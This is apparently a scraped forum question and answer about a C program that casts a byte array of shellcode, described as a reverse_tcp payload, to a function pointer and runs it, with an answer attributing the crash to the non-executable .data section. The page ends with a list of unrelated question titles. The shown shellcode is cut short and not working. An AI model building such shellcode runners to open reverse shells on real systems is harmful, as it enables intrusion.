Executing shellcode in C (visual studio 2017
I encounter a problem when I try to execute a shellcode in C, (a basic reverse_tcp, pointing to a local address).
I started from the basics with the following code:
#define WIN32_LEAN_AND_MEAN
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main(int argc, char * argv[])
{
unsigned char shellcode[] = \
"\xfd\xab\xd2\xa9\xb1\x29\xe0\xdd\x38\x64\x51\x24\x9d\x0f\xdf"
"\x8a\xc2\x01\x0d\x2e\x6c\x9b\x86\xa9\x2e\x6f\xd9\xb3\x04\x4a"
"\x35\x1c\x0a\xc6\xe7\x18\xf4\xaf\x3e\xed\x4b\x5c\x1a\x08\x8b"
"\x71\x27\x5e\x20\xd1\x4d\xaf\x8f\x2d\x23\xe1\x68\x25\xf3\x19"
"\xd2\x7b\x5e\xca\x26\x2a\xc7\xa0\x98\x64\x72\x7b\x03\x05\xf0"
"\x46\x03\xdf\x19\x86\xfb\x04\xd0\x7d\xd9\xf8\xa0\xfb\x8c\xa0"
"\x2d\xb2\xcb\x7f\xde\x7c\xc4\xd4\xe6\x94\xde\x56\x81\x53\xfc"
"\x59\xe3\xfc\xb6\x7d\x50\x7e\xde\x6d\xf0\x8a\x33\x35\x99\xfc"
"\x66\x0c\x45\xf0\xdc\xcb\x49\x4d\xa1\x2f\xd7\xaf\x59\xdc\xcf"
"\x90\x8b\xd3\x7c\xb7\x7e\x6f\xa8\x15\xe4\x1d\xfd\xc2\xe7\x9d"
"\x15\x88\x8b\xfb\x3b\x30\x1d\x41\xe6\x22\xdf\x3f\x4f\xb8\xe3"
"\x65\x0d\xa8\xc1\x0a\x2d\xe9\x77\x7d\x84\x83\xa7\xfc\x29\x80"
"\x72\xcd\xcc\x68\xa1\x08\x35\xda\xba\x01\xe2\xe5\x01\xe9\x05"
;
int(*ret)() = (int(*)())shellcode;
ret();
}
return 1;
}
(I cut the shellcode for the example) when I compile this .c file with visual studio community 2017, I get a few warnings about argv and argc that aren't used, and conversion from () to (void) in ret.
Then I try to execute the file, and i get an awesome "has stopped working". So I launch the debug in visual studio,and here is what i get:
So this is an access violation error, but why? I searched on google, and it seems that this error can have many causes, but I can't figure why it happens to me.
You normally can't execute code in the .data section of an executable on Windows. The access violation occurs because you're trying to run code that isn't executable.
https://msdn.microsoft.com/en-us/library/windows/desktop/aa366553(v=vs.85).aspx
- Difference between sqrt(x) and pow(x,0.5)
- Can you explain this 'Hello world' program?
- how can i check file write permissions in C++ code?
- Compare floating point numbers as integers
- Ninja Build System + gcc/clang doesn't output diagnostic colors
- Why does my C program give an error when looping through an array?
- Printing char array with null character in the middle in C
- How do I read the source code for a C library in CLion
- pthread nice value setting for default scheduler in C
- Use a 3d array on a function (array that contains arrays that contain strings)
- frida-server being targeted by port scan?
- Are compound literals always lvalue?
- Why is the beginning of a C file stream called `SEEK_SET`?
- How to Take whitespace in Input in C
- "undefined reference to" errors when linking static C library with C++ code
- Audio timescale-pitch modification - Open source examples?
- What is the easiest way to create a secured network client in Linux (C) without any external libraries?
- Are there any non-twos-complement implementations of C?
- Read variable value from PE file
- C: Memory Allocation on Stack for Nested Structures
- The max number of digits in an int based on number of bits
- Aliasing struct and array the C++ way
- AC_SEARCH_LIBS on a static library that itself has dependencies?
- What is the relation between operator precedence and order of evaluation?
- Why does my getop function in C return '+' correctly but not '=' when there are leading spaces?
- How to efficiently compare a block of memory to a single byte?
- What is the most elegant way to work with global variables in an embedded system?
- sqrt is only defined when argument is nonnegative
- How do you get the network interface index for the loopback interface?
- use of -mcmodel=kernel flag in x86 platform